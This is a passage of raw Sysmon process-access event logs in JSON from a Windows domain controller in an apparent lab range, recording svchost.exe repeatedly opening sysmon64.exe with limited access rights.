07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4689,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4690,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4691,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4692,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4693,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4694,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4695,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4696,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 